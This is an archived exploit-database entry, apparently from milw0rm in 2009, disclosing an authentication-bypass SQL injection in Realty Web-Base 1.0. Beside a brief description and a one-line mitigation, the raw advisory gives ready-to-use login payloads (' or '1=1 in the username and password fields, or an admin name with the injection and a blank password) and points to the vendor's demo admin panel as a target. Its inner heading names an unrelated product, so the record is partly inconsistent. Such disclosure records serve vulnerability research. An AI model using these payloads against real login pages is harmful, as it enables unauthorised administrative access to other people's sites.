header-logo
Suggest Exploit
vendor:
Realty Web-Base
by:
ThE g0bL!N
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Realty Web-Base
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:realtywebware:realty_web-base:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Realty Web-Base v1.0 (Auth bypass) SQL Injection Vulnerability

A vulnerability in Realty Web-Base v1.0 allows an attacker to bypass authentication by entering a username of ' or '1=1 and a password of ' or '1=1 or a username of [admin_name]' or '1=1 and a password of nothing. This allows the attacker to gain access to the admin panel of the website.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

---------------------------------------------------------------
------------------------------------------------------------
Realty Web-Base v1.0 (Auth bypass) SQL Injection Vulnerability       
---------------------------------------------------------------

Founder : ThE g0bL!N
Home:WwW.h4ckF0u.CoM
Vendor:http://www.realtywebware.com
---------------------------------------------------------------
---------------------------------------------------------------

Simple Customer 1.3 SQL Injection Vulnerability
------------------------------------------------
username :' or '1=1

Password: ' or '1=1
         Or
username:[admin_name]' or '1=1


password: Nothing
--------------------------------------
Dem0
----
http://www.realtywebware.com/demo/admin/

--------------------------------------

Greeting To ALL My Friends (Dz)

# milw0rm.com [2009-05-08]